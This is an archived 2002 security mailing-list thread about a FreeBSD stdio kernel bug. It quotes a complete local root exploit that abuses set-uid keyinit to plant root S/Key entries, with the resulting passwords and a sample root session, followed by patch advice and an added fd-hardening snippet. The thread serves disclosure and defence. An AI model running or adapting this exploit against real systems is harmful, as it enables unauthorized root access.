Re: cheers

From: Onie Camara (neil@restricted.dyndns.org)
Date: 04/25/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: "zeno" <bugtraq@cgisecurity.net>
Date: Wed, 24 Apr 2002 23:01:57 -0500

Thanks. This is what I did to one of my client's FreeBSD. Patch actually
complained. It asked me to reverse. :-)

----- Original Message -----
From: "zeno" <bugtraq@cgisecurity.net>
To: "Onie Camara" <neil@restricted.dyndns.org>
Cc: "KF" <dotslash@snosoft.com>; "bugtraq" <bugtraq@securityfocus.org>;
"vuln-dev" <vuln-dev@security-focus.com>
Sent: Wednesday, April 24, 2002 3:58 PM
Subject: Re: cheers

> >
> > Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying. :-)
> >
> > So any solutions?
>
> cvsup new source rebuild kernel. A patch is out already.
>
> - zeno@cgisecurity.com
>
> >
> > ----- Original Message -----
> > From: "KF" <dotslash@snosoft.com>
> > To: "bugtraq" <bugtraq@securityfocus.org>; "vuln-dev"
> > <vuln-dev@security-focus.com>
> > Sent: Tuesday, April 23, 2002 1:24 AM
> > Subject: cheers
> >
> >
> > > http://www.phased.home.ro/iosmash.c
> > >
> > > -KF
> > >
> > >
> >
> >
>
> > ------------------------------------------------------------------------------
> >
> >
> > >
> > > /*
> > >   phased/b10z
> > >   phased@snosoft.com
> > >   23/04/2002
> > >
> > >   stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
> > >   decided to make a trivial exploit to easily get root :)
> > >
> > >   > id
> > >   uid=1003(phased) gid=999(phased) groups=999(phased)
> > >   > ./iosmash
> > >   Adding phased:
> > >   <--- HIT CTRL-C --->
> > >   > su
> > >   s/key 98 snosoft2
> > >   Password:MASS OAT ROLL TOOL AGO CAM
> > >   xes#
> > >
> > >   this program makes the following skeys valid
> > >
> > >   95: CARE LIVE CARD LOFT CHIC HILL
> > >   96: TESS OIL WELD DUD MUTE KIT
> > >   97: DADE BED DRY JAW GRAB NOV
> > >   98: MASS OAT ROLL TOOL AGO CAM
> > >   99: DARK LEW JOLT JIVE MOS WHO
> > >
> > >   http://www.snosoft.com
> > >   cheers Joost Pol
> > > */
> > >
> > > #include <stdio.h>
> > > #include <unistd.h>
> > >
> > > int main(int argc, char *argv[]) {
> > > while(dup(1) != -1);
> > > close(2);
> > > execl("/usr/bin/keyinit",
> > > "\nroot 0099 snosoft2 6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> > > }
> > >
> > >
> >
> >
>
>
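
The program quoted above closes descriptor 2 before exec'ing the set-uid /usr/bin/keyinit. As an added example (not part of the thread, and not the FreeBSD kernel patch it mentions), this is a common userland hardening idiom: a privileged program checks descriptors 0-2 at startup and binds any closed one to /dev/null before opening other files. The function name sanitize_std_fds is hypothetical.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Make sure descriptors 0, 1 and 2 are open before the program opens
 * anything else. A closed slot is bound to /dev/null so that a later
 * open() of a sensitive file cannot land on a stdio descriptor.
 * Returns the number of descriptors repaired, or -1 on failure
 * (including a full descriptor table); the caller should then exit.
 */
int sanitize_std_fds(void)
{
    int repaired = 0;

    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                    /* descriptor is open */
        if (errno != EBADF)
            return -1;                   /* unexpected error */

        int nfd = open("/dev/null", O_RDWR);
        if (nfd == -1)
            return -1;                   /* e.g. EMFILE: refuse to run */
        if (nfd != fd) {
            /* open() returns the lowest free slot, so this is a
             * safety net rather than the expected path. */
            if (dup2(nfd, fd) == -1) {
                close(nfd);
                return -1;
            }
            close(nfd);
        }
        repaired++;
    }
    return repaired;
}

int main(void)
{
    /* First thing a set-uid program does, before any open() or exec. */
    if (sanitize_std_fds() < 0)
        _exit(1);
    /* ... privileged work would follow here ... */
    return 0;
}
```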


